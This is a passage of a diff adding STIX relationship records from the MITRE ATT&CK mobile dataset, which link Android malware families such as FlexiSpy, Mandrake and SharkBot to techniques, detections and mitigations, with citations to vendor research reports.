+ } + ], + "modified": "2020-12-17T20:15:22.444Z", + "description": "[HenBox](https://attack.mitre.org/software/S0544) can load additional Dalvik code while running.(Citation: Palo Alto HenBox)", + "relationship_type": "uses", + "source_ref": "malware--aef537ba-10c2-40ed-a57a-80b8508aada4", + "target_ref": "attack-pattern--6c49d50f-494d-4150-b774-a655022d20a6", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--6c859d6b-28b1-409d-90ea-d4eba64edf82", + "type": "relationship", + "created": "2020-09-11T16:22:03.301Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Lookout ViperRAT", + "url": "https://blog.lookout.com/viperrat-mobile-apt", + "description": "M. Flossman. (2017, February 16). ViperRAT: The mobile APT targeting the Israeli Defense Force that should be on your radar. Retrieved September 11, 2020." 
+ } + ], + "modified": "2020-09-11T16:22:03.301Z", + "description": "[ViperRAT](https://attack.mitre.org/software/S0506) can collect system information, including brand, manufacturer, and serial number.(Citation: Lookout ViperRAT)", + "relationship_type": "uses", + "source_ref": "malware--f666e17c-b290-43b3-8947-b96bd5148fbb", + "target_ref": "attack-pattern--e2ea7f6b-8d4f-49c3-819d-660530d12b77", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--32be51e2-f74d-441f-aa0d-952697a76494", + "type": "relationship", + "created": "2019-09-04T15:38:56.774Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "FortiGuard-FlexiSpy", + "url": "https://d3gpjj9d20n0p3.cloudfront.net/fortiguard/research/Dig%20Deep%20into%20FlexiSpy%20for%20Android%28white%20paper%29_KaiLu.pdf", + "description": "K. Lu. (n.d.). Deep Technical Analysis of the Spyware FlexiSpy for Android. Retrieved September 10, 2019." + } + ], + "modified": "2019-10-14T18:08:28.599Z", + "description": "[FlexiSpy](https://attack.mitre.org/software/S0408) uses a `FileObserver` object to monitor the Skype and WeChat database file and shared preferences to retrieve chat messages, account information, and profile pictures of the account owner and chat participants. 
[FlexiSpy](https://attack.mitre.org/software/S0408) can also spy on popular applications, including Facebook, Hangouts, Hike, Instagram, Kik, Line, QQ, Snapchat, Telegram, Tinder, Viber, and WhatsApp.(Citation: FortiGuard-FlexiSpy)", + "relationship_type": "uses", + "source_ref": "tool--1622fd3d-fcfc-4d02-ac49-f2d786f79b81", + "target_ref": "attack-pattern--702055ac-4e54-4ae9-9527-e23a38e0b160", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--0d2d9c6e-6ac8-4cda-bfa4-cedf26a1760a", + "type": "relationship", + "created": "2021-02-17T20:43:52.333Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Lookout FrozenCell", + "url": "https://blog.lookout.com/frozencell-mobile-threat", + "description": "Michael Flossman. (2017, October 5). FrozenCell: Multi-platform surveillance campaign against Palestinians. Retrieved November 11, 2020." + } + ], + "modified": "2021-02-17T20:43:52.333Z", + "description": "[FrozenCell](https://attack.mitre.org/software/S0577) has used an online cell tower geolocation service to track targets.(Citation: Lookout FrozenCell)", + "relationship_type": "uses", + "source_ref": "malware--96ea1e13-d50f-45f1-b0cf-4ac9bc5a2d62", + "target_ref": "attack-pattern--99e6295e-741b-4857-b6e5-64989eb039b4", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--0972d3cf-717e-4ed2-a89d-9cbe61081956", + "created": "2020-11-24T17:55:12.873Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Talos GPlayed", + "description": "V. Ventura. (2018, October 11). GPlayed Trojan - .Net playing with Google Market . 
Retrieved November 24, 2020.", + "url": "https://blog.talosintelligence.com/2018/10/gplayedtrojan.html" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T17:21:56.899Z", + "description": "[GPlayed](https://attack.mitre.org/software/S0536) has communicated with the C2 using HTTP requests or WebSockets as a backup.(Citation: Talos GPlayed) ", + "relationship_type": "uses", + "source_ref": "malware--a993495c-9813-4372-b9ec-d168c7f7ec0a", + "target_ref": "attack-pattern--2282a98b-5049-4f61-9381-55baca7c1add", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--0f949bc5-9f6a-4ec8-a29a-87e309aa08a2", + "created": "2020-12-24T22:04:28.027Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Lookout Uyghur Campaign", + "description": "A. Kumar, K. Del Rosso, J. Albrecht, C. Hebeisen. (2020, June 1). Mobile APT Surveillance Campaigns Targeting Uyghurs - A collection of long-running Android tooling connected to a Chinese mAPT actor. 
Retrieved November 10, 2020.", + "url": "https://www.lookout.com/documents/threat-reports/us/lookout-uyghur-malware-tr-us.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T21:20:48.937Z", + "description": "[GoldenEagle](https://attack.mitre.org/software/S0551) has modified or configured proxy information.(Citation: Lookout Uyghur Campaign) ", + "relationship_type": "uses", + "source_ref": "malware--0b9c5d11-651a-4378-b129-5c584d0242c5", + "target_ref": "attack-pattern--fcb11f06-ce0e-490b-bcc1-04a1623579f0", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--c00031dd-0466-4fd2-9724-ab1c04232bad", + "created": "2023-03-20T18:44:40.722Z", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-20T18:44:40.722Z", + "description": "", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--5ae32c6a-2d12-4b8f-81ca-f862f2be0962", + "target_ref": "attack-pattern--498e7b81-238d-404c-aa5e-332904d63286", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--86afe8cc-6d6d-4952-8fee-619e95d53a7f", + "created": "2022-04-06T13:39:39.883Z", + "x_mitre_version": "0.1", + "x_mitre_deprecated": false, + "revoked": false, + "description": "", + "modified": "2022-04-06T13:39:39.883Z", + "relationship_type": "subtechnique-of", + "source_ref": 
"attack-pattern--74e6003f-c7f4-4047-983b-708cc19b96b6", + "target_ref": "attack-pattern--c548d8c4-a0a3-4a24-bb79-2a84abbc7b36", + "x_mitre_attack_spec_version": "2.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--73d22490-4043-42d7-ad25-74e4a642bf6a", + "created": "2023-03-20T18:41:45.186Z", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-20T18:41:45.186Z", + "description": "", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--a7f22107-02e5-4982-9067-6625d4a1765a", + "target_ref": "attack-pattern--0f4fb01b-d57a-4375-b7a2-342c9d3248f7", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--e9cbc901-38cb-4895-9dfb-7a4fe10ba6d7", + "type": "relationship", + "created": "2018-10-17T00:14:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "url": "https://www.wandera.com/reddrop-malware/", + "description": "Nell Campbell. (2018, February 27). RedDrop: the blackmailing mobile malware family lurking in app stores. 
Retrieved September 18, 2018.", + "source_name": "Wandera-RedDrop" + } + ], + "modified": "2019-10-15T19:56:13.162Z", + "description": "[RedDrop](https://attack.mitre.org/software/S0326) exfiltrates details of the victim device operating system and manufacturer.(Citation: Wandera-RedDrop)", + "relationship_type": "uses", + "source_ref": "malware--9ed10b5a-ff20-467f-bf2f-d3fbf763e381", + "target_ref": "attack-pattern--e2ea7f6b-8d4f-49c3-819d-660530d12b77", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--9951d8c0-d210-4776-808b-421b613f244f", + "created": "2019-09-23T13:36:08.463Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "securelist rotexy 2018", + "description": "T. Shishkova, L. Pikman. (2018, November 22). The Rotexy mobile Trojan – banker and ransomware. Retrieved September 23, 2019.", + "url": "https://securelist.com/the-rotexy-mobile-trojan-banker-and-ransomware/88893/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T16:55:41.638Z", + "description": "[Rotexy](https://attack.mitre.org/software/S0411) hides its icon after first launch.(Citation: securelist rotexy 2018)", + "relationship_type": "uses", + "source_ref": "malware--0626c181-93cb-4860-9cb0-dff3b1c13063", + "target_ref": "attack-pattern--f05fc151-aa62-47e3-ae57-2d1b23d64bf6", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--aa5877fd-ef7d-435e-86af-c427f086b3c5", + "created": "2019-08-08T18:47:57.655Z", + "x_mitre_version": "1.0", + 
"external_references": [ + { + "source_name": "Android 10 Privacy Changes", + "url": "https://developer.android.com/about/versions/10/privacy/changes#clipboard-data", + "description": "Android Developers. (n.d.). Privacy changes in Android 10. Retrieved September 11, 2019." + } + ], + "x_mitre_deprecated": false, + "revoked": false, + "description": "Android 10 introduced changes to prevent applications from accessing clipboard data if they are not in the foreground or set as the device’s default IME.(Citation: Android 10 Privacy Changes) ", + "modified": "2022-04-01T16:35:38.189Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "relationship_type": "mitigates", + "source_ref": "course-of-action--0beabf44-e8d8-4ae4-9122-ef56369a2564", + "target_ref": "attack-pattern--c4b96c0b-cb58-497a-a1c2-bb447d79d692", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--734fa2bf-17af-4e54-8d83-4cf9759e4ba9", + "type": "relationship", + "created": "2020-09-11T15:52:12.520Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Bitdefender Mandrake", + "url": "https://www.bitdefender.com/files/News/CaseStudies/study/329/Bitdefender-PR-Whitepaper-Mandrake-creat4464-en-EN-interactive.pdf", + "description": "R. Gevers, M. Tivadar, R. Bleotu, A. M. Barbatei, et al.. (2020, May 14). Uprooting Mandrake: The Story of an Advanced Android Spyware Framework That Went Undetected for 4 Years. Retrieved July 15, 2020." 
+ } + ], + "modified": "2020-09-11T15:52:12.520Z", + "description": "[Mandrake](https://attack.mitre.org/software/S0485) can block, forward, hide, and send SMS messages.(Citation: Bitdefender Mandrake)", + "relationship_type": "uses", + "source_ref": "malware--52c994fa-b6c8-45a8-9586-a4275cf19307", + "target_ref": "attack-pattern--b327a9c0-e709-495c-aa6e-00b042136e2b", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--603df08f-22d3-4418-9151-4b3a3c9c7c24", + "created": "2023-03-15T16:40:37.553Z", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-15T16:40:37.553Z", + "description": "", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--181a9f8c-c780-4f1f-91a8-edb770e904ba", + "target_ref": "attack-pattern--08e22979-d320-48ed-8711-e7bf94aabb13", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--23a67f24-a8eb-4e31-acf1-11cb5e9f88b2", + "created": "2023-01-18T19:57:13.265Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "nccgroup_sharkbot_0322", + "description": "RIFT: Research and Intelligence Fusion Team. (2022, March 3). SharkBot: a “new” generation Android banking Trojan being distributed on Google Play Store. 
Retrieved January 18, 2023.", + "url": "https://research.nccgroup.com/2022/03/03/sharkbot-a-new-generation-android-banking-trojan-being-distributed-on-google-play-store/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-27T18:43:35.115Z", + "description": "[SharkBot](https://attack.mitre.org/software/S1055) can use Accessibility Services to detect which process is in the foreground.(Citation: nccgroup_sharkbot_0322)", + "relationship_type": "uses", + "source_ref": "malware--9cd72f5c-bec0-4f7e-bb6d-296937116291", + "target_ref": "attack-pattern--1b51f5bc-b97a-498a-8dbd-bc6b1901bf19", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--97158eda-5092-4939-8b5c-1ef5ab918089", + "type": "relationship", + "created": "2020-04-24T15:12:11.189Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "TrendMicro Coronavirus Updates", + "url": "https://blog.trendmicro.com/trendlabs-security-intelligence/coronavirus-update-app-leads-to-project-spy-android-and-ios-spyware/", + "description": "T. Bao, J. Lu. (2020, April 14). Coronavirus Update App Leads to Project Spy Android and iOS Spyware. Retrieved April 24, 2020." 
+ } + ], + "modified": "2020-04-24T15:12:11.189Z", + "description": "[Concipit1248](https://attack.mitre.org/software/S0426) can collect device photos.(Citation: TrendMicro Coronavirus Updates)", + "relationship_type": "uses", + "source_ref": "malware--89c3dbf6-f281-41b7-be1d-a0e641014853", + "target_ref": "attack-pattern--e1c912a9-e305-434b-9172-8a6ce3ec9c4a", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--26bf27dc-f65d-477d-abbd-f4c3ce475c51", + "created": "2022-04-01T12:37:17.515Z", + "x_mitre_version": "0.1", + "x_mitre_deprecated": false, + "revoked": false, + "description": "OS feature updates often enhance security and privacy around permissions. ", + "modified": "2022-04-01T12:37:17.515Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--0beabf44-e8d8-4ae4-9122-ef56369a2564", + "target_ref": "attack-pattern--11c2c2b7-1fd4-408f-bc2e-fe772ef9df5e", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--ab18ee61-f94a-411c-9893-941714ce713e", + "created": "2023-03-20T18:44:26.642Z", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-20T18:44:26.642Z", + "description": "", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--5ae32c6a-2d12-4b8f-81ca-f862f2be0962", + "target_ref": "attack-pattern--74e6003f-c7f4-4047-983b-708cc19b96b6", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + 
"object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--bb34aff0-9af9-463b-a1aa-7f5ec7b84630", + "created": "2020-07-15T20:20:59.300Z", + "x_mitre_version": "1.0", + "external_references": [ + { + "source_name": "Bitdefender Mandrake", + "url": "https://www.bitdefender.com/files/News/CaseStudies/study/329/Bitdefender-PR-Whitepaper-Mandrake-creat4464-en-EN-interactive.pdf", + "description": "R. Gevers, M. Tivadar, R. Bleotu, A. M. Barbatei, et al.. (2020, May 14). Uprooting Mandrake: The Story of an Advanced Android Spyware Framework That Went Undetected for 4 Years. Retrieved July 15, 2020." + } + ], + "x_mitre_deprecated": false, + "revoked": false, + "description": "[Mandrake](https://attack.mitre.org/software/S0485) can manipulate visual components to trick the user into granting dangerous permissions, and can use phishing overlays and JavaScript injection to capture credentials.(Citation: Bitdefender Mandrake)", + "modified": "2022-04-12T10:01:44.682Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "relationship_type": "uses", + "source_ref": "malware--52c994fa-b6c8-45a8-9586-a4275cf19307", + "target_ref": "attack-pattern--4c58b7c6-a839-4789-bda9-9de33e4d4512", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--62cc60d9-1581-4a0f-b7e2-a18d386511e6", + "created": "2022-03-30T13:48:43.977Z", + "x_mitre_version": "0.1", + "x_mitre_deprecated": false, + "revoked": false, + "description": "Mobile security products can typically detect jailbroken or rooted devices. 
", + "modified": "2022-03-30T13:48:43.977Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--cf2cccb1-cab8-431a-8ecf-f7874d05f433", + "target_ref": "attack-pattern--29f1f56c-7b7a-4c14-9e39-59577ea2743c", + "x_mitre_attack_spec_version": "2.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--a8bf6bbd-88f0-4725-ba4f-3b9317dca388", + "created": "2022-03-30T20:36:18.656Z", + "x_mitre_version": "0.1", + "x_mitre_deprecated": false, + "revoked": false, + "description": "Attestation can typically detect rooted devices. For MDM-enrolled devices, action can be taken if a device fails an attestation check. ", + "modified": "2022-03-30T20:36:18.656Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--ff4821f6-5afb-481b-8c0f-26c28c0d666c", + "target_ref": "attack-pattern--1b51f5bc-b97a-498a-8dbd-bc6b1901bf19", + "x_mitre_attack_spec_version": "2.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--276bfd69-33cc-4665-8aa7-72bed65d01f9", + "created": "2023-02-28T21:42:52.037Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "cloudmark_tanglebot_0921", + "description": "Felipe Naves, Andrew Conway, W. Stuart Jones, Adam McNeil . (2021, September 23). TangleBot: New Advanced SMS Malware Targets Mobile Users Across U.S. and Canada with COVID-19 Lures. 
Retrieved February 28, 2023.", + "url": "https://www.cloudmark.com/en/blog/malware/tanglebot-new-advanced-sms-malware-targets-mobile-users-across-us-and-canada-covid-19" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-29T21:25:22.438Z", + "description": "[TangleBot](https://attack.mitre.org/software/S1069) can request location permissions.(Citation: cloudmark_tanglebot_0921)", + "relationship_type": "uses", + "source_ref": "malware--68156e5a-4c3a-46dd-9c5e-c0bfdec6651f", + "target_ref": "attack-pattern--99e6295e-741b-4857-b6e5-64989eb039b4", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--418168ad-fee9-42c8-ac27-11f7472a5f86", + "created": "2019-09-03T19:45:48.498Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "SWB Exodus March 2019", + "description": "Security Without Borders. (2019, March 29). Exodus: New Android Spyware Made in Italy. 
Retrieved September 3, 2019.", + "url": "https://securitywithoutborders.org/blog/2019/03/29/exodus.html" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T17:09:08.738Z", + "description": "[Exodus](https://attack.mitre.org/software/S0405) One checks in with the command and control server using HTTP POST requests.(Citation: SWB Exodus March 2019) ", + "relationship_type": "uses", + "source_ref": "malware--3049b2f2-e323-4cdb-91cb-13b37b904cbb", + "target_ref": "attack-pattern--2282a98b-5049-4f61-9381-55baca7c1add", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--557e6d99-d7d8-4e2f-bc01-66b0754de089", + "created": "2022-03-28T19:41:27.610Z", + "x_mitre_version": "0.1", + "x_mitre_deprecated": false, + "revoked": false, + "description": "Application developers should be cautious when selecting third-party libraries to integrate into their application.", + "modified": "2022-03-28T19:41:27.610Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--25dc1ce8-eb55-4333-ae30-a7cb4f5894a1", + "target_ref": "attack-pattern--0d95940f-9583-4e0f-824c-a42c1be47fad", + "x_mitre_attack_spec_version": "2.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--6b41d649-bcd0-4427-baa1-15a145bace6e", + "type": "relationship", + "created": "2018-10-17T00:14:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "url": 
"https://researchcenter.paloaltonetworks.com/2017/07/unit42-spydealer-android-trojan-spying-40-apps/", + "description": "Wenjun Hu, Cong Zheng and Zhi Xu. (2017, July 6). SpyDealer: Android Trojan Spying on More Than 40 Apps. Retrieved September 18, 2018.", + "source_name": "PaloAlto-SpyDealer" + } + ], + "modified": "2019-08-09T17:56:05.642Z", + "description": "[SpyDealer](https://attack.mitre.org/software/S0324) downloads and executes root exploits from a remote server.(Citation: PaloAlto-SpyDealer)", + "relationship_type": "uses", + "source_ref": "malware--86fc6f0c-86d9-473e-89f3-f50f3cb9319b", + "target_ref": "attack-pattern--6c49d50f-494d-4150-b774-a655022d20a6", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--f31490e8-ef81-40d5-bba9-24ca580d2ee6", + "created": "2020-01-21T14:20:50.409Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Bitdefender - Triout 2018", + "description": "L. Arsene, C. Ochinca. (2018, August 20). Triout – Spyware Framework for Android with Extensive Surveillance Capabilities. 
Retrieved January 21, 2020.", + "url": "https://labs.bitdefender.com/2018/08/triout-spyware-framework-for-android-with-extensive-surveillance-capabilities/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T20:46:20.857Z", + "description": "[ViceLeaker](https://attack.mitre.org/software/S0418) includes code to hide its icon, but the function does not appear to be called in an analyzed version of the software.(Citation: Bitdefender - Triout 2018)", + "relationship_type": "uses", + "source_ref": "malware--6fcaf9b0-b509-4644-9f93-556222c81ed2", + "target_ref": "attack-pattern--f05fc151-aa62-47e3-ae57-2d1b23d64bf6", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--3272111a-f31d-47d5-a266-1749255b5016", + "created": "2019-09-23T13:36:08.335Z", + "x_mitre_version": "1.0", + "external_references": [ + { + "source_name": "securelist rotexy 2018", + "url": "https://securelist.com/the-rotexy-mobile-trojan-banker-and-ransomware/88893/", + "description": "T. Shishkova, L. Pikman. (2018, November 22). The Rotexy mobile Trojan – banker and ransomware. Retrieved September 23, 2019." 
+ } + ], + "x_mitre_deprecated": false, + "revoked": false, + "description": "[Rotexy](https://attack.mitre.org/software/S0411) can be controlled through SMS messages.(Citation: securelist rotexy 2018)", + "modified": "2022-04-19T14:25:41.669Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "relationship_type": "uses", + "source_ref": "malware--0626c181-93cb-4860-9cb0-dff3b1c13063", + "target_ref": "attack-pattern--ec4c4baa-026f-43e8-8f56-58c36f3162dd", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--2a472430-c30e-4877-8933-2e75f1de9a01", + "created": "2022-03-30T14:00:45.120Z", + "x_mitre_version": "0.1", + "x_mitre_deprecated": false, + "revoked": false, + "description": "", + "modified": "2022-03-30T14:00:45.120Z", + "relationship_type": "revoked-by", + "source_ref": "attack-pattern--e083305c-49e7-4c87-aae8-9689213bffbe", + "target_ref": "attack-pattern--693cdbff-ea73-49c6-ac3f-91e7285c31d1", + "x_mitre_attack_spec_version": "2.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--2e797961-356f-4763-bdb2-0ebc2ad4c8b0", + "created": "2019-09-04T20:01:42.722Z", + "x_mitre_version": "1.0", + "x_mitre_deprecated": false, + "revoked": false, + "description": "Enterprise policies should block access to the Android Debug Bridge (ADB) by preventing users from enabling USB debugging on Android devices unless specifically needed (e.g., if the device is used for application development). 
